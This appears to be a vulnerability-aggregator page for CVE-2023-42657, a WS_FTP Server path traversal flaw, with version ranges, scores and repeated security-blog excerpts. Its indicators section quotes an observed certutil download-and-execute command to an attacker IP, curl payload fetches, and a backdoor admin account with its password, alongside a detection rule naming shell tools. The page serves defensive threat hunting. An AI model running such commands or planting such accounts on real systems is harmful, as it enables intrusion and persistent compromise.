CVE-2023-42657
published 2023-09-27CVE-2023-42657: In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a directory traversal vulnerability was discovered. An attacker could leverage this vulnerability to…
PriorityP183critical9.6CVSS 3.1
AVNACLPRLUINSCCNIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
17.03%
96.7th percentile
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a directory traversal vulnerability was discovered. An attacker could leverage this vulnerability to perform file operations (delete, rename, rmdir, mkdir) on files and folders outside of their authorized WS_FTP folder path. Attackers could also escape the context of the WS_FTP Server file structure and perform the same level of operations (delete, rename, rmdir, mkdir) on file and folder locations on the underlying operating system.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| progress | ws_ftp_server | < 8.7.4 | 8.7.4 |
| progress | ws_ftp_server | >= 8.8.0 < 8.8.2 | 8.8.2 |
| progress_software_corporation | ws_ftp_server | >= 8.7.0 < 8.7.4 | 8.7.4 |
| progress_software_corporation | ws_ftp_server | >= 8.8.0 < 8.8.2 | 8.8.2 |
Detection & IOCsextracted from sources · hover to see the quote
command/c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string} %TEMP%\{10-length-alpha-string}.exe & start /B %TEMP%\{same-10-length-alpha-string}.exe↗
sigma↗
endpoint.os = 'windows' AND event.category = 'process' AND src.process.name in:anycase ('w3wp.exe') AND src.process.cmdline contains 'WSFTPSVR_WTM' AND tgt.process.cmdline contains ('certutil', 'mshta', 'powershell', 'pwsh', 'cmd', 'curl', 'wmic', 'nslookup', 'ping', 'whoami')- →Exploitation of CVE-2023-42657 spawns child processes from w3wp.exe running under the 'WSFTPSVR_WTM' application pool; hunt for w3wp.exe with cmdline containing 'WSFTPSVR_WTM' spawning certutil, mshta, powershell, pwsh, cmd, curl, wmic, nslookup, ping, or whoami ↗
- →Attack Chain 1 uses certutil with -urlcache flag to download and execute a payload from an IP-literal URL on port 8080 with a 22-character alphanumeric path; monitor certutil.exe spawned by w3wp.exe with -urlcache arguments ↗
- →Attack Chain 2 uses curl to download cl.exe to C:\ root and then executes it directly; monitor for curl spawned by w3wp.exe writing executables to C:\ and subsequent execution of C:/cl.exe ↗
- →Attack Chain 2 also uses OOB DNS callbacks to oastify.com subdomains for exploitation confirmation; monitor DNS queries to *.oastify.com from WS_FTP server processes ↗
- →Attack Chain 3 drops executables (n1.exe, n2.exe, s.exe, xmpp.exe, ft.exe) to C:\ProgramData and creates a local admin account named 'temp' with password 'p@ssw0rd123'; monitor for net user/localgroup commands and new files in C:\ProgramData from w3wp.exe lineage ↗
- ·Exploitation began September 30, 2023; only WS_FTP Server versions prior to 8.7.4 and 8.8.2 are vulnerable — patched versions are not affected ↗
- ·The vulnerability requires a low-complexity attack with no user interaction per CVSS:3.1 scoring, meaning internet-exposed WS_FTP servers are at high risk of opportunistic scanning and exploitation ↗
- ·Upgrading using the full installer is the only remediation path; partial patches are insufficient ↗
CVSS provenance
nvdv3.19.6CRITICALCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
vulncheck9.9CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vrp3-qmw4-rx8c: In WS_FTP Server version 8
ghsa_unreviewed·2023-09-27
CVE-2023-42657 [CRITICAL] CWE-22 GHSA-vrp3-qmw4-rx8c: In WS_FTP Server version 8
In WS_FTP Server version 8.7.0 prior to 8.7.4 and
version 8.8.0 prior to 8.8.2, a directory traversal vulnerability was discovered. An attacker could leverage this vulnerability to perform file operations (delete, rename, rmdir, mkdir) on files and folders outside of their authorized WS_FTP folder path. Attackers could also escape the context of the WS_FTP Server file structure and perform the same level of operations (delete, rename, rmdir, mkdir) on file and folder locations on the underlying operating system.
VulnCheck
Progress WS_FTP Server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2023·CVSS 9.9
CVE-2023-42657 [CRITICAL] Progress WS_FTP Server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Progress WS_FTP Server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a directory traversal vulnerability was discovered. An attacker could leverage this vulnerability to perform file operations (delete, rename, rmdir, mkdir) on files and folders outside of their authorized WS_FTP folder path. Attackers could also escape the context of the WS_FTP Server file structure and perform the same level of operations (delete, rename, rmdir, mkdir) on file and folder locations on the underlying operating system.
Affected: Progress WS_FTP Server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation Re
No detection rules found.
No public exploits indexed.
Sentinelone
Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
blogs_sentinelone·2023-10-09·CVSS 10.0
CVE-2023-40044 [CRITICAL] Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
Starting on September 30, 2023, SentinelOne has observed actors exploiting the recently disclosed flaws in Progress’ WS_FTP against Windows servers running a vulnerable version of the software. The two highest severity vulnerabilities–CVE-2023-40044 and CVE-2023-42657–were assigned a CVSS score of 10 and 9.9, respectively. We observed at least three types of multi-stage attack chains, which begin with exploitation, and then commands to download a payload from a remote server, often via an IP-literal URL.
This active, in-the-wild exploitation marks the third wave of attacks against a Progress Software product in 2023 . While exploitation is likely opportunistic, organizations in the Information Technology Managed Service Provider (IT MSP), Software and Technology, Legal Services, Engineeri
Sentinelone
Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
blogs_sentinelone·2023-10-09·CVSS 10.0
CVE-2023-40044 [CRITICAL] Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
Starting on September 30, 2023, SentinelOne has observed actors exploiting the recently disclosed flaws in Progress’ WS_FTP against Windows servers running a vulnerable version of the software. The two highest severity vulnerabilities–CVE-2023-40044 and CVE-2023-42657–were assigned a CVSS score of 10 and 9.9, respectively. We observed at least three types of multi-stage attack chains, which begin with exploitation, and then commands to download a payload from a remote server, often via an IP-literal URL.
This active, in-the-wild exploitation marks the third wave of attacks against a Progress Software product in 2023. While exploitation is likely opportunistic, organizations in the Information Technology Managed Service Provider (IT MSP), Software and Technology, Legal Services, Engineerin
Tenable
CVE-2023-40044, CVE-2023-42657: Progress Software Patches Multiple Vulnerabilities in WS_FTP Server
blogs_tenable·2023-10-02·CVSS 10.0
[CRITICAL] CVE-2023-40044, CVE-2023-42657: Progress Software Patches Multiple Vulnerabilities in WS_FTP Server
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Huntress
Critical Vulnerabilities: WS_FTP Exploitation | Huntress
blogs_huntress·2023-10-02·CVSS 6.1
CVE-2023-40044 [MEDIUM] Critical Vulnerabilities: WS_FTP Exploitation | Huntress
On Thursday, September 28, 2023, software vendor Progress released a security advisory for numerous vulnerabilities affecting the WS_FTP Server Ad Hoc Transfer Module within their WS_FTP software.
These vulnerabilities were disclosed as:
CVE-2023-40044 (CVSS: 10)
CVE-2023-42657 (CVSS 9.9)
CVE-2023-40045 (CVSS 8.3)
CVE-2023-40046 (CVSS 8.2)
CVE-2023-40048 (CVSS 6.8)
CVE-2022-27665 (CVSS 6.1)
CVE-2023-40049 (CVSS 5.3)
Most notable amongst these were CVE-2023-40044 and CVE-2023-42657, both critical severity issues. Throughout this past weekend, the cybersecurity industry has been chasing CVE-2023-40044 specifically.
## What We Know So Far
As disclosed by Progress , CVE-2023-40044 is the critical (CVSS: 10) remote code execution vulnerability that does not require authentication.
F
Checkpoint
2nd October – Threat Intelligence Report
blogs_checkpoint·2023-10-02
CVE-2023-5217 2nd October – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 2nd October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 2nd October, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Check Point researchers have detected a phishing campaign exploiting popular file-sharing program Dropbox. The threat actors use legitimate Dropbox pages to send official email messages to the victims, which will then redirect the recipients to credential stealing pages.
Japanese entertainment giant Sony, as well as major
Bleepingcomputer
Progress warns of maximum severity WS_FTP Server vulnerability
blogs_bleepingcomputer·2023-09-28·CVSS 10.0
[CRITICAL] Progress warns of maximum severity WS_FTP Server vulnerability
## Progress warns of maximum severity WS_FTP Server vulnerability
## Sergiu Gatlan
Progress Software, the maker of the MOVEit Transfer file-sharing platform recently exploited in widespread data theft attacks, warned customers to patch a maximum severity vulnerability in its WS_FTP Server software.
The company says thousands of IT teams worldwide use its enterprise-grade WS_FTP Server secure file transfer software.
In an advisory published on Wednesday, Progress disclosed multiple vulnerabilities impacting the software's manager interface and Ad hoc Transfer Module.
Out of all WS_FTP Server security flaws patched this week, two of them were rated as critical, with the one tracked as CVE-2023-40044 receiving a maximum 10/10 severity rating and allowing unauthenticated attackers to exec
Huntress
Critical Vulnerabilities: WS_FTP Exploitation | Huntress
blogs_huntress·CVSS 6.1
CVE-2023-40044 [MEDIUM] Critical Vulnerabilities: WS_FTP Exploitation | Huntress
On Thursday, September 28, 2023, software vendor Progress released a security advisory for numerous vulnerabilities affecting the WS_FTP Server Ad Hoc Transfer Module within their WS_FTP software.
These vulnerabilities were disclosed as:
- CVE-2023-40044 (CVSS: 10)
- CVE-2023-42657 (CVSS 9.9)
- CVE-2023-40045 (CVSS 8.3)
- CVE-2023-40046 (CVSS 8.2)
- CVE-2023-40048 (CVSS 6.8)
- CVE-2022-27665 (CVSS 6.1)
- CVE-2023-40049 (CVSS 5.3)
Most notable amongst these were CVE-2023-40044 and CVE-2023-42657, both critical severity issues. Throughout this past weekend, the cybersecurity industry has been chasing CVE-2023-40044 specifically.
## What We Know So Far
As disclosed by Progress, CVE-2023-40044 is the critical (CVSS: 10) remote code execution vulnerability that does not require authenticat
2023-09-27
Published
Exploited in the wild